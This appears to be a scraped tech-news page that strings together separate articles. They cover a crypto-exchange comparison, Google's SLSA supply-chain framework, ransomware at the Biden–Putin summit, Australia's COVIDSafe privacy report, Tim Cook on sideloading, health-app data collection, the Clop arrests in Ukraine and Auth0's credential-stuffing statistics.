Information Technology

Cryptocurrency exchanges are a lot like the auction house in World of Warcraft. Like in WoW, you’re buying and selling digital goods, except this time you’re buying and selling, say, Dogecoin instead of Crystalized Dread. Basically, crypto exchanges help traders acquire or divest cryptocurrency holdings. They do this by converting fiat money (actual government-backed currency) into the digital currency of your choice (and vice versa when you sell). Some exchanges only take real money. Some only take digital currency. All charge fees of one sort or another, which is key to how they make a profit.

It should go without saying, but we’ll say it here: investing in cryptocurrency is risky as all heck. Crypto investing involves transferring hard-earned actual money for some fake bits generated by a purposely obtuse algorithm in the hope that enough other people will believe in the fake bits to make them somehow real. If that raises the hairs on the back of your neck, it should. But some of you will be brave enough, or crazy enough, or wealthy enough that it just doesn’t matter, and put down cold, hard cash in return for fantasy money. Good luck. People are out there are making money off this stuff. We’re not, but someone is. How we made our selectionsWe did a literature review of the findings of six financially-oriented sites (they’re listed below) who ranked the exchanges and aggregated those findings. By looking at findings from evaluators across the internet, we stand a better chance of creating a more reliable picture of the exchanges, while also being careful to avoid picking winners in a possibly regulated market. Across all the sites, we identified 43 crypto exchanges. Of those 43 exchanges, 29 of them were only reviewed on one site. Because we’re explicitly trying to find how they’re perceived across the internet, we removed all of the one-hit wonders. We also removed another six exchanges that showed up on only two sites. None of them scored near the top of their respective reviewers’ lists, so there was no great loss. That left us with seven providers tested on three or more sites, giving us a good starting point. Of those seven, four exchanges (Coinbase, Gemini, Binance.US, and Kraken) each got three sets of star-ratings. Two sites rated on a 1-5 scale and one (BitDegree) rated on a 1-10 scale. We converted BitDegree’s rating to a 1-5 scale (by dividing the ratings in half), and that allowed us to total up average ratings for the four exchanges where we had enough representative data.

These are the crypto exchanges that you might consider checking out.

Probably the best-known crypto exchange

OverviewReview average: 4.63Free crypto on signup: $5 worth of free bitcoinNumber of currencies: 20+Wallet: YesTrading feesSpread fee: 0.5%Fees: $1.49 – $2.99 depending on amountWire transfer fees: $10 incoming, $25 outgoingPayment fees when buying cryptoACH deposits: 1.49%Coinbase wallet: 1.49%Debit cards: 3.99%Many categories of online services have canonical brands that are nearly synonymous with the category. For online shopping, it’s Amazon. For auctions, it’s eBay. For movie streaming, it’s still Netflix. For cryptocurrency, it’s Bitcoin. And for crypto exchanges, it’s Coinbase. No other crypto exchange has the brand equity of Coinbase. Coinbase was one of only two sites that were rated by all our source reviewers (the other was Gemini).Coinbase seems to be a solid platform if you’re just starting out and you want to trade some bitcoin. One benefit of Coinbase is that it’s a US company. This is important if you’re trading more than $10,000 and want to keep your tax paperwork less complex. That’s because US Coinbase customers are not required to file the Report of Foreign Bank and Financial Accounts (FBAR) with the IRS.Coinbase does offer a wallet, so you can treat the exchange as your one-stop shop for basic crypto. There’s also a Coinbase Pro service for those who have more in-depth intentions in this field.ProsProbably best known crypto exchangeClean user interfaceConsMediocre technical supportHigher fees than many

View Now at Coinbase

A monster of a crypto exchange

OverviewReview average: 4.62Free crypto on signup: NoneNumber of currencies: 50+Wallet: NoTrading feesFees (maker/taker): 0-0.2%/0.1-0.5% depending on volumeAdditional fees: Leverage buying has margin opening and rollover feesPayment fees when buying cryptoACH deposits: $0-10 depending on bank optionDebit/credit cards: 3.75% + $0.25Crypto deposit: Percentage of currency being deposited (varies by currency)Withdrawal feesCash withdrawal: $0-35 depending on bank optionCrypto withdrawal: Percentage of currency being withdrawn (varies by currency)There’s something unsettling about using a currency exchange whose name immediately brings to mind the phrase “beware the…” before its name. But, at least according to the aggregated internet reviews, you probably don’t have to beware this Kraken. It has the second highest review average and quite a lot of positive comments.The Miami Herald, for example, says it has the “best customer support of any crypto exchange,” even though the only support provided is via chat or ticket requests. Given that many of the crypto exchanges we’ve looked at tend to elicit “good, but terrible customer support,” that may not be a terribly high bar. But any customer support has to be better than terrible customer support, so there you go.The customer support may be needed, because the interface is relatively complex and is reputed to “have bugs that need fixing in the UI,” according to the Herald. Kraken also offers a variety of advanced services including margin trading, futures trading, and staking rewards.ProsBetter customer service than many other exchangesWide range of currencies and servicesConsComplex interfaceSomewhat buggy

View Now at Kraken

Lots of currencies, but US restrictions and UI issues

OverviewReview average: 4.57Free crypto on signup: NoneNumber of currencies: 200+Wallet: YesTrading feesSpot trading fee: 0.1%Instant buy/sell fee: 0.5%Discount: 25% if you use BNB (Binance’s own currency)Deposit feesACH deposits: freeWire: $15Debit cards: 4.5%Withdrawal feesACH withdrawal: 0%Wire: $15 domestic, $35 internationalDebit card: not availableBinance.US is the American version of the Binance trading platform. The US site has a more limited selection of coins and tokens to trade than the international Binance. That’s not necessarily meant to imply that the coins and tokens on the US implementation are any safer, however.There are also issues with access control. We’ve seen quite a few reports like this one, which describe serious difficulties setting up and using multifactor authentication.If you’re a big-money trader (more than $50,000 in a given month), you may be able to get discounts on trading fees. The company offers a wide range of order types including limit, market, and stop-limit mechanisms. Some of these options may not be available in the US.ProsBig volume discountsMany coin types availableConsFutures and margin trading not available in USMany additional limits for US traders

View Now at Binance.US

Because…the founders are the Winklevoss twins

OverviewReview average: 4.23Free crypto: $10 worth of Bitcoin after buying/selling $100 BTCNumber of currencies: 25+Wallet: NoTrading fees”Convenience” fee: 0.5% over market rateTransaction fees: $0.99-$2.99Large transaction ($200,00+) fee: 1.49% of market valueDeposit feesACH deposits: freeWire transfer fees: $10 incoming, $25 outgoingNo debit or credit cardsTransfer feesACH: freeWire: freeSome crypto: freeSo here’s a bit of trivia. Remember Cameron Winklevoss and Tyler Winklevoss, contenders to the title of founders of Facebook? It’s a long story and part of a relatively inaccurate movie with Aaron Sorkin’s unbelievable but spectacularly-written dialog. Both Winklevi (they’re twins) were played by Armie Hammer in the movie.Gemini trades in quite a few digital currencies, but that’s not all. The company has begun trading in NFTs. One interesting fact is that Gemini is a US-based company that’s FDIC-insured and regulated by the New York State Department of Financial Services.Gemini appears to generally have a reputation for a good UI. Guru99 says, “It is a simple, elegant, and secure way to build bitcoin and crypto portfolio.” That feeling is echoed by most of the internet evaluations we examined.ProsGood user interfaceNew York State regulatedConsChallenging and unclear fee structureFounders not on Zuckerberg’s Friends list

View Now at Gemini

Lots of currencies and flat-fee trading

OverviewReview average: not enough ratingsFree crypto: NoNumber of currencies: 220+Wallet: YesTrading feesFlat fee for all transactions: 0.25%Deposit feesNo wire transfer feesOnly US Dollar transfers allowed via wire transferIndividual currency transfers may have feesAccording to Tradesanta.com, “Bittrex is probably one of the most advanced crypto exchanges on the market today. It provides users with the fastest transactions available.”Based up here in the Pacific Northwest, Bittrex is a Seattle-based company. However, despite being a US-based company, Bittrex states “Bittrex is not a regulated exchange under U.S. securities laws.”Bittrex was founded by Bill Shihara (a former security engineering manager at Amazon and Blackberry, with a prior 11-year Microsoft tenure), Richie Lai (a former leader in the Amazon information security team, with a prior 12 year Microsoft tenure), and Rami Kawach (a former principle security engineer at Amazon, with time at Qualys and Microsoft). All that certainly explains why they’re based in the Evergreen State.ProsFree online walletVery few deposit feesA metric ton of currenciesConsNo margin tradingFlat fee could get expensive

View Now at Bittrex

Accepts credit and debit cards, plus Apple Pay

OverviewReview average: not enough ratingsFree crypto: NoNumber of currencies: 10+Wallet: NoTrading feesSpread: XBX + 2%Buy order commission fee: Up to 3.9%Sell order commission fee: 0.1% to 0.9%Payment fees when buying cryptoDebit/credit cards: Additional 5% “momentum” feeSEPA bank transfer fee: £0SWIFT bank transfer: £0 over $1,000, £20 under $1,000Withdrawal feesWithdrawal: $0Additional sell fee: 0.1-0.9%Coinmama, the exchange with the best name we’ve seen, was founded by Nimrod Gruber (also the best founder name we’ve seen), is registered in Slovakia and operates out of Israel.The exchange’s most obvious benefit is the ease of transferring fiat currency (i.e., dollars or euros) into and out of the exchange. The firm accepts not only debit cards, but credit cards and even Apple Pay.Coinmama is more of a reseller than an exchange. You can’t use one cryptocurrency to buy another. Instead, if you want to buy a currency, you have to use fiat money. The same is true of selling a currency. So if you want to use your Bitcoin to buy Ethereum, you’ll first need to sell your Bitcoin and get dollars or euros, then spend those dollars or euros to buy the Etherium.When you add up the spread fee percentage plus the sell fee percentage, you get a fee basis that’s higher than Coinbase, which has among the highest fees we’ve seen. You can lower those fees a bit by being what Coinmama calls Curious, Enthusiast, or Believer, a loyalty discount based on your trading volume over both a rolling 90-day period and lifetime on Coinmama.ProsBest name evar!Accepts credit and debit cards, plus Apple PayConsVery few currencies comparative to other exchangesFlat fee could get expensive

View Now at Coinmama

eToro

Automatically mimic successful traders (and there’s Alex Baldwin)

OverviewReview average: not enough ratingsFree crypto: Get $50 when you buy $1,000 worth of cryptoNumber of currencies: 14Wallet: YesTrading feesTrading fee: 0.75% to 2.9% based on the spread between bid and askConversion (currency to currency) fee: 0.1%Payment fees when buying cryptoDeposit fee: $0Additional fees: Extra fee for deposting non-USD currencyWithdrawal feesWithdrawal: $0Additional fees: Extra fee for withdrawing in non-USD currencyOne of the most interesting features of eToro is its “practice trading account,” which allows you to game trading and get used to the process before risking actual money. Another interesting feature is eToro’s CopyTrade option, which allows you to automatically run trades based on the actions of top traders on the platform. Essentially, you can put your trading on autopilot, and as long as the trader you’re mimicking is making smart moves, so will you.Be aware that there are some built-in delays getting started with eToro. Every incoming deposit is put on hold for 7 days. Transfers can then take another 3 days, so you’re looking at 10 days before you’re actually in the money, er, crypto. This also applies to wired-in funds as well, which can also take up to 7 days to hit your account.ProsAbility to mimic successful traders automaticallyPractice trading accountThe best BaldwinConsComparatively high trading feesCredit/debit cards not acceptedBaked-in delays on top of baked-in delays

How much does it cost to trade crypto currency?

While exchanges are not banks, they all have one very bankerly philosophy: whether or not you make money, the banker always wins. In this case, the exchanges make money through a wide range of fees attached to just about everything. For example, there’s the spread fee. If you buy cryptocurrency, you’ll pay a bit more than the asking price. If you sell cryptocurrency, you’ll get a bit less than market price. That bit more or bit less is the spread.On top of the actual purchase fees are the fees you pay to bring real world money (called stablecoin in crypto vernacular) into the exchange. These include ACH transfers, wire transfers, use of the exchange’s wallet, and debit and credit card fees (although most exchanges only accept debit cards).

How secure are crypto exchanges?

Many of the reviewers we explored during our literature review made claims about the security of the various exchanges. Over the past year, there has been a constant series of hacks of exchanges, accounts, and crypto-related activities. We do not feel that we have anywhere near enough information to declare one exchange more secure than another (and, quite honestly, don’t feel that any reviewer has enough information to make any claims).As such, we’re not reporting that one exchange is more secure than another, or this or that exchange has not been hacked (because they may have been, but not reported it). This is definitely an area where caveat emptor is in full effect. Be careful, young Padawan. Be very, very careful.

How risky is crypto investment?

Look, crypto investing isn’t for everyone. Almost everything about the process, once you think about the real money implications, should invoke a sense of caution and care, if not some crystalized dread. Much of the terminology and mechanisms behind crypto trading is complex and arcane, so it’s very possible to lose your shirt.That said, the exchanges we’re spotlighting here seem to be some of the best out there, at least according to other outlets that examined them in some detail.Personally, most of my digital currency holdings are in World of Warcraft gold, and even that has some market value. If you want 5,000 WoW gold coins, you can buy it for about $400. I didn’t buy my gold. Instead, years ago when I had more time to play video games, I farmed (the WoW equivalent of crypto mining) it in game.Why do I keep bringing all this back to fake money in a video game? Because, fundamentally, all these cryptocurrencies we’ve been talking about are also fake money in a digital space. The value of crypto exists solely because enough people decided it has value — and that value can vanish the minute people lose faith.But isn’t that also true of so-called real money? Most of us have paper in our wallets or a number on a website that represents our cash holdings. Our real money has value because we choose to accept it for goods and services. So, it’s entirely possible that, as time moves on, more and more sellers will accept certain cryptocurrencies in return for their goods and services.For now, though, just be careful.

The sites we used as source material These are the sites we used in researching and assembling the data in this article: What about you? Have you invested in crypto? Do you plan to in the future? Share your thoughts and experiences (and advice, if you have any) below.

You can follow my day-to-day project updates on social media. Be sure to follow me on Twitter at @DavidGewirtz, on Facebook at Facebook.com/DavidGewirtz, on Instagram at Instagram.com/DavidGewirtz, and on YouTube at YouTube.com/DavidGewirtzTV. More

To tackle the growing threat of attacks on the software supply chain, Google has proposed the Supply chain Levels for Software Artifacts framework, or SLSA which is pronounced “salsa”. Sophisticated attackers have figured out that the software supply chain is the soft underbelly of the software industry. Beyond the game-changing SolarWinds hack, Google points to the recent Codecov supply chain attack, which stung cybersecurity firm Rapid7 via a tainted Bash uploader.

ZDNet Recommends

While supply chain attacks aren’t new, Google notes they’ve escalated in the past year, and has shifted the focus from exploits for known or zero-day software vulnerabilities.SEE: Network security policy (TechRepublic Premium)Google describes SLSA as “an end-to-end framework for ensuring the integrity of software artifacts throughout the software supply chain.”It takes its lead from Google’s internal “Binary Authorization for Borg” (BAB) – a process Google has been using for more than eight years to verify code provenance and implement code identity. The goal of BAB is to reduce insider risk by ensuring that production software deployed at Google is properly reviewed, especially if the code has access user data, Google notes in a white paper. 

“The goal of SLSA is to improve the state of the industry, particularly open source, to defend against the most pressing integrity threats. With SLSA, consumers can make informed choices about the security posture of the software they consume,” said Kim Lewandowski of Google’s open-source security team and Mark Lodato, from the BAB Team.  SLSA looks to lockdown everything in the software build chain, from the developer to source code, the build platform and CI/CD systems, the package repository, and dependencies. Dependencies are a major weak point for open-source software projects. In February, Google proposed new protocols for critical open-source software development that would require code reviews by two independent parties, and that maintainers use two-factor authentication.   It reckons the higher SLSA levels would have helped prevent the attack on SolarWinds’ software build system, which was compromised to install an implant that injected a backdoor during each new build. It also argues SLSA would help in the CodeCov attack because “provenance of the artifact in the GCS bucket would have shown that the artifact was not built in the expected manner from the expected source repo.”SEE: GDPR: Fines increased by 40% last year, and they’re about to get a lot biggerWhile the SLSA framework iis just a set of guidelines for now, Google envisages that its final form will go beyond best practices via enforceability. “It will support the automatic creation of auditable metadata that can be fed into policy engines to give “SLSA certification” to a particular package or build platform,” Google said. The scheme consists of four levels of SLSA, with four being the ideal state where all software development processes are protected, as pictured below. 
Google More

Ransomware was a major point of discussion for both US President Joe Biden and Russian President Vladimir Putin during their first in-person summit on Wednesday. After the three-hour meeting in Geneva, Switzerland, both leaders held separate press conferences where they hinted at key points of discussions and potential compromise.Putin denied that Russia was harboring ransomware groups and refused to answer questions about other cyberattacks. Biden was also vague about what was agreed upon between the two leaders but confirmed that he pressed Putin specifically on the issue of ransomware. “I talked about the proposition that certain critical infrastructure should be off limits to attack. Period. By cyber or any other means. I gave them a list, 16 specific entities. 16 defined as critical infrastructure,” Biden said.Tom Kellermann, a member of the US Secret Service’s Cyber Investigations Advisory Board, said the 16 entities Biden was referring to were what CISA has defined as “critical infrastructure sectors.”Kellermann added that the 16 sectors are chemical, commercial facilities, communications, critical manufacturing, dams, defense industrial base, emergency, energy, financial services, food and agriculture, government facilities, healthcare and public health, information technology, nuclear reactors, materials and waste, transportation systems, water and waste systems.  All of these sectors have faced dozens of ransomware attacks over the last three years, and Biden said he pushed Putin to understand what the US was going through. He referenced the ransomware attack on Colonial Pipeline, which left parts of the East Coast scrambling for gas for days. “I looked at him and said: ‘How would you feel if ransomware took on the pipelines from your oil fields?’ He said: ‘It would matter.’ I pointed out to him that we have significant cyber capability. And he knows it,” Biden said to reporters. 

He went on to say that there were “reputational” consequences to the cyberattacks being leveraged from Russia that Putin was aware of.The meeting follows a stern warning that was sent out by the US and other G7 countries on Monday that specifically called out Russia for either launching their own cyberattacks or harboring ransomware organizations. The G7 said Russia needed to “identify, disrupt, and hold to account those within its borders who conduct ransomware attacks, abuse virtual currency to launder ransoms, and other cyber crimes.”NATO also sent out a statement after the summit in Brussels reaffirming the idea that “the impact of significant malicious cumulative cyber activities might, in certain circumstances, be considered as amounting to an armed attack.”Kellermann, who is also head of cybersecurity strategy at VMware, said the summit was “a seminal moment for civilizing cyberspace” and praised Biden for highlighting the need to protect critical industries.”As a result of this delineation, I believe that significant ransomware attacks against major critical infrastructures will diminish now, but possibly increase against traditional corporations, such as in the retail and financial sectors.”Many cybersecurity experts said the summit would have little effect on ransomware groups allowed to operate with impunity in a number of countries. But the idea that cybersecurity had reached a level of concern worthy of mention among two world leaders was a positive sign for some.”It was an excellent use of the ‘bully pulpit’ to let the world know that cybersecurity matters to America — and specifically the office of the president. We in the cybersecurity world already have an ‘all-hands-on-deck’ mentality — but it’s healthy to see that our concern is now shared in the prism of leadership, outside of our sector,” said YouAttest CEO Garret Grajek. Elena Elkina, a partner at privacy and data protection consulting firm Aleada, noted that Putin does not like demands or being told what to do, and she predicted he would respond to Biden’s forceful talk about cyberattacks in a more understated way. “It will be something more tangible that makes obvious his opinion,” she said. Cybersecurity researcher Chloé Messdaghi said the summit was just one manifestation of a deeper cyber Cold War that both countries needed to back down from. While the summit was a good start to addressing the problems between both countries, Messdaghi said formalized pacts around cybersecurity would be hard to come by. “The reality is that we may never have absolute and effective treaty-level accords on cyberattacks because so much is done by proxy, but each global superpower must strive to prevent chaos within their borders,” Messdaghi added. More

The Office of the Australian Information Commissioner (OAIC) has released its second six-monthly report on the privacy and security of Australia’s controversial COVIDSafe app.While there were no reports of breaches, no complaints made, and no investigations underway, the OAIC said the app, paraded by Prime Minister Scott Morrison as “digital sunscreen”, was the subject of 14 “enquiries”.This comprised 12 enquiries from individuals and two from businesses during the period 16 November 2020 to 15 May 2021.”We provided general information in response to 11 enquiries and provided assistance on how to make a complaint in response to three enquiries,” the report [PDF] said.During Senate Estimates last month, Information and Privacy Commissioner Angelene Falk said the OAIC, by the end of April, received around 25 inquiries from members of the public seeking information about COVIDsafe and their privacy rights. Breaking down the types of enquiries, the report said the OAIC received 10 enquiries raising general issues or concerns about COVIDSafe, including an enquiry about the changes to the Privacy Act relating to COVIDSafe and an enquiry from an individual seeking to delete data uploaded to the National COVIDSafe Data Store. The OAIC also received four enquiries about a request to download or use COVIDSafe, which the report explained as an enquiry about a venue refusing an individual entry unless they used COVIDSafe or signed in using a QR code and an enquiry about whether an employer could require an employee to download COVIDSafe.

The legislation wrapped around COVIDSafe prevents a directive from an employer or venue to require the app’s download.Falk told Senators last month the OAIC has implemented a series of assessments or audits of the COVIDSafe app, which she said assess the privacy safeguards in relation to the Privacy Act and follow the “information lifecycle” of the COVIDsafe app.”We’re assessing the security and access protections to the national COVIDSafe’s data storage facility,” she said. “We’re also assessing the manner in which information is accessed by the states and territories. And the legislation passed by Parliament at this time last year, gave my office jurisdiction in relation to the states and territories handling of that COVIDSafe app data.”The OAIC has four assessments underway. The report said the OAIC has progressed draft reports for all of them.The agency also provided guidance for state and territory health authorities regarding COVIDSafe and COVID app data during the reported period.Also included in the OAIC document is a report from the Inspector-General of Intelligence and Security (IGIS).IGIS reviewed the compliance of agencies it has oversight of between 16 November 2020 and 15 May 2021 and said it remained satisfied that these agencies have appropriate policies and/or procedures in place and are taking reasonable steps to avoid the intentional collection of COVID app data.”IGIS staff have conducted inspections of these agencies to determine whether COVID app data that has been collected incidentally as part of agency functions has not been accessed or used, and that any COVID app data has been deleted as soon as practicable after the agency becomes aware it has been collected,” IGIS wrote in its brief report.”While relevant agencies have incidentally collected COVID app data, which the Privacy Act recognises may occur, IGIS had found that there is no evidence to suggest that these agencies have deliberately targeted or have decrypted, accessed, or used such data.”IGIS has not received any complaints or public interest disclosures about COVIDSafe app data, but said there were ongoing discussions between relevant parties regarding the application of the prohibition against “disclosure” as set out in the Privacy Act.COVIDSafe, according to the Digital Transformation Agency, had picked up 567 close contacts not found through my manual contact tracing, a large increase on the previous number of 17 contacts. The agency said there have been 779 uploads to the National Data Store since inception last year.Earlier this week, the government of Western Australia introduced legislation that would keep the information obtained via the SafeWA check-in app by contact tracers away from the state’s law enforcement authorities.The state currently lacks protections for such information, with WA Police having used it to investigate “two serious crimes”.”The system was introduced in the middle of the global pandemic and while access to this information was lawful, the WA government’s intention was for contact registers to only be used for contact tracing purposes,” the government said.”Information collected through the SafeWA app has never been able to be used for commercial purposes. This will remain the case under the new legislation.”The ABC on Wednesday reported the state government was forced to introduce legislation after failing to reach an agreement with police. The report indicates Premier Mark McGowan found out in April that police were accessing the data to find witnesses to a number of serious crimes, including a murder, but was previously unaware.”We attempted to negotiate an agreement with the police. They advised that it was lawful, and they couldn’t not do things that are lawful,” he told ABC Radio Perth.WA Police Commissioner Chris Dawson said the circumstances that required access to the SafeWA data were exceptional.”I accept that people don’t always read fine print on insurance policies or whatever, and this is a very important principle, but the police have only got information twice out of 240 million transactions and they were exceptional circumstances, and it is lawful,” he said, speaking on 6PR radio.”Police have a duty to investigate crime, and we’re talking about a man who was shot in a public arena with an allegedly high-powered weapon, and other people were injured.”The state opposition has called it “a breach of trust”.RELATED COVERAGE More

Image: Apple
Tim Cook has claimed in an interview with Brut that if Apple was forced to allow sideloading of apps, as Android does, it would destroy security and privacy of iOS. Speaking to the Digital Markets Act proposed by the European Commission, Cook said sideloading was not in the “best interests of the user”. “That would destroy the security of the iPhone and a lot of the privacy initiatives that we’ve built into the App Store where we have privacy nutrition labels and app tracking transparency, where it forces people to get permission to track across apps,” Cook said. “These things would would not exist anymore except in people that stuck in our ecosystem and so I worry deeply about privacy and security.” The Apple CEO said Android has 47 times more malware than iOS, and this was directly due to Apple’s ecosystem being tied down to one app store and all apps being reviewed. “That keeps a lot of this malware stuff out of our ecosystem, and customers have told us very continuously how much they value that, and so we’re going to be standing up for the user in in the discussions and we’ll see where it goes,” he said. Cook did say there were parts of the Digital Services Act (DSA) that could be used to fight online disinformation.

“We do suffer today from vast disinformation … it’s clear that there needs to be something done here,” he said. “This is not an acceptable state of the world and as I look at the DSA, there’s some parts of it that I think will help this, but I’m not sure that anybody yet has a handle on how to fix it entirely and I think it deserves more discussion and more debate.” In recent testimony as part of the Epic vs Apple trial, Cook said without curation, Apple’s App Store would be a toxic mess. Related Coverage More

Image: Getty Images
Researchers from Macquarie University have found what they labelled as serious problems with privacy and inconsistent privacy practices in health apps.The researchers estimated that just over 99,000 apps out of the 2.8 million on Google Play and 1.96 million on the Apple App Store relate to health and fitness. They include the management of health conditions and symptom checking, as well as step and calorie counters and menstruation trackers.They probed 15,000 free health apps in the Google Play store and compared their privacy practices with a random sample of more than 8,000 non-health apps. They found that while these apps collected less user data than other types of mobile apps, 88% could access and potentially share personal data.”For example, about two thirds could collect advert identifiers or cookies, one third could collect a user’s email address, and about a quarter could identify the mobile phone tower to which a user’s device is connected, potentially providing information on the user’s geolocation,” the researchers wrote in a study published by The BMJ.See also: Fertility-tracking app Flo Health settles FTC allegations of inappropriate data sharingOnly 4% of the health-related apps actually transmitted data, which was mostly user’s name and location information. “This percentage is substantial and should be taken as a lower bound for the real data transmissions performed by the apps,” they added.

The analysis of app files and code identified 65,068 data collection operations; on average four for each app. Analysis of app traffic identified 3,148 transmissions of user data across 616 different apps. The main types of data collected by these apps include contact information, user location, and several device identifiers such as IMEI, MAC address, and IMSI, which is an international mobile subscriber identity.Privacy analysis of mobile health apps
Image: Macquarie University
87.5% of data collection operations and 56% of user data transmissions were on behalf of third-party services, such as external advertisers, analytics, and tracking providers, the research found. 23% of user data transmissions occurred on insecure communication channels, they added.665 unique third party entities were identified but those responsible for most of the data collection operations, the researchers said, were the likes of Google, Facebook, and Yahoo!.”The apps collected user data on behalf of hundreds of third parties, with a small number of service providers accounting for most of the collected data,” the research says.The researchers also found that 28% — 5,903 — of the apps it analysed did not offer any privacy policy text, and at least 25% — 15,480 — of user data transmissions violated what was stated in the privacy policies. “Mobile apps are fast becoming sources of information and decision support tools for both clinicians and patients,” the researchers concluded. “Such privacy risks should be articulated to patients and could be made part of app usage consent. “We believe the trade-off between the benefits and risks of ‘mHealth’ apps should be considered for any technical and policy discussion surrounding the services provided by such apps.”RELATED COVERAGEApple’s new privacy tool lets you choose which apps can see and share your data. Here’s what you need to knowThe Cupertino giant has announced a new privacy feature coming next spring, which will let users make their own data choices.Google says iOS privacy summaries will arrive when its apps are updatedSearch and advertising giant says it is working to ‘understand and comply’ with Apple’s upcoming changes to app tracking.These dating apps are tracking your locationWhile dating apps are a simple click away on the app stores, as soon as you download them, they become a treasure trove of personal information that can be used against you.Contact-tracing apps: Android phones were leaking sensitive data, find researchersAndroid phones have been keeping track of contact-tracing apps’ data in system logs, which some third-party apps can easily access. More

The Ukrainian National Police announced a series of raids on Wednesday that ended with the arrest of six people allegedly part of the group behind the Clop ransomware. The group is responsible for some of the most headline-grabbing ransomware attacks seen over the last two years, with hundreds of victims ranging from Shell and Kroger to Stanford University, the University of Maryland, and the University of Colorado. Ukrainian police said the total damage done by their attacks amounts to an estimated $500 million.The Cyberpolice Department of the Ukrainian National Police released a lengthy report Wednesday morning on the raids that included photos and video. Working with South Korean police officers, members of Interpol and unnamed US agencies, officers in Ukraine raided 21 different residences in Kyiv and nearby towns.During the raid, dozens of computers and expensive cars were seized in addition to about $185,000. The report said server infrastructure was taken down and the homes were seized. The six people arrested are facing up to eight years in prison for a variety of crimes related to the group’s ransomware attacks and the laundering of money brought in from ransoms. 
Ukranian National Police
The Ukranian National Police noted that South Korean officials were particularly interested in the raid because of ransomware attacks launched by Clop against four South Korean companies in 2019. More than 800 internal servers and computers from the companies were infected in the attacks.The group also attacked South Korean e-commerce giant E-Land in November, crippling the company for days. Clop members became well-known for attacking companies using old versions of the Accellion FTA file-sharing server like Bombardier. The Reserve Bank of New Zealand, Washington State Auditor, and cybersecurity firm Qualys are just a few of the victims attacked by Clop members through the Accellion vulnerability.

Kim Bromley, senior cyber threat intelligence analyst at Digital Shadows, said the Clop ransomware has been active since February 2019 and generally targets large organizations. “Despite partaking in the ever-popular double-extortion tactic, Clop’s reported activity level is relatively low when compared with the likes of ‘REvil’ (aka Sodinokibi) or ‘Conti,'” Bromley explained.In spite of the press around the raid, many online noted that the leak site used by Clop members is still up. A source from cybersecurity company Intel 471 threw cold water on the excitement around the raid in an interview with Bleeping Computer. They told the news outlet that they do not think any of the major players behind Clop were arrested in the raid because they live in Russia. They added that the people arrested were mostly involved in the money laundering part of the ransomware operation.  Clop rose to prominence in 2020 after they demanded a ransom of more than $20 million from Software AG, one of the largest software companies in the world. Multiple cybersecurity companies have reported that Clop has ties to a malware distribution group named TA505 and a cybercrime group known as FIN11.Ransomware groups are facing increased scrutiny from law enforcement globally as hundreds of organizations continue to deal with the crippling aftereffects of attacks. Bromley noted that last week, the Avaddon ransomware shut down its operations and the Ziggy ransomware did the same earlier this year, signaling that the increasing law enforcement pressure was having an effect. “Arrests and operations targeting ransomware infrastructure must continue in the short term, in order to maintain pressure on ransomware operators,” Bromley added.  Vectra CTO Oliver Tavakoli, said raids like this are one of the key levers that can be used to shrink the lucrative ransomware ecosystem. “When the likelihood of repercussions rise, less people will be drawn into the business of ransomware,” Tavakoli said. “When periodic disruptions occur in the supply chain of ransomware and sometimes ransoms are reclaimed (as the FBI recently did with some of the Colonial Pipeline ransom payments), the business of ransomware itself becomes less lucrative and less people are drawn into it.”Other experts noted the timing of the raid, which came on the same day as the summit between US President Joe Biden and Russian President Vladimir Putin. Ransomware was a significant topic of discussion, Biden said after the meeting. “This is a bold move, especially given Ukraine’s tensions with Russia. It would be better to see comprehensive global law enforcement efforts take hold,” said Hitesh Sheth, CEO at Vectra. “Cybersecurity has displaced nuclear arms as the premier superpower security issue of our era. We can hope the Biden-Putin summit leads to cooperation and structural progress in this area.” More

A new report from Auth0 has discovered that government institutions as well as travel and retail companies continue to face an inordinate amount of credential stuffing attacks. 

ZDNet Recommends

Auth0, which was recently acquired by Okta for $6.5 billion, released startling statistics of what they are seeing in their State of Secure Identity report.In the first three months of 2021, Auth0 found that credential stuffing accounted for 16.5% of attempted login traffic on its platform, with a peak of over 40% near the end of March. About 15% of all attempts to register a new account can be attributed to bots, according to Auth0, which found that for certain industries, the numbers are even higher. The report also said that Auth0 maintains a constantly-growing database of username-password pairs that were known to be compromised in data breaches. For the first 90 days of 2021, the Auth0 platform detected an average of more than 26,600 breached passwords being used each day. On Feb. 9, the numbers reached a high for 2021 at more than 182,000.Attackers will spend between $50 and $1,000 for validated credentials from credit card records, crypto accounts, social media accounts and even Netflix accounts, according to the report. The most commonly detected threats on Auth0’s platform include credential stuffing, fraudulent registrations, MFA bypass, and breached password usage. 

Auth0’s platform found that 39% of IP addresses associated with credential stuffing attacks are based in the US. The technology and travel industries account for more than 50% of all SQL injection attacks seen on the platform. Travel and retail enterprises are targeted the most by brute attacks activities, followed by government institutions, industrial services companies and technology organizations. The technology industry faces the most MFA brute force attempts at 42% on Auth0’s platform, followed by consumer goods at 15% and financial services at 13%.Auth0 noted that attackers often target rewards programs offered by restaurants or stores because “they are rarely secured well and the benefits are easily monetized.”Companies in the financial services industry lead the way in MFA adoption, followed by technology and industrial services, according to the report. While most people choose email or SMS as their MFA factor, many use time-based one-time passcodes as well. Many organizations in the technology, financial services and industrial services industries are also using bot detection programs as a way to slow down or limit credential stuffing attacks. Duncan Godfrey, vice president of security engineering at Auth0, said it is becoming harder and harder for security companies to secure their customers’ identities because of the widespread failure to protect data and the prevalence of breached passwords. The availability of automated attack tools has made the humble password “a protective measure from the past,” Godfrey explained.Multiple breaches and cyberattacks in the last month originated from reused passwords or account details that had been leaked in previous attacks.  More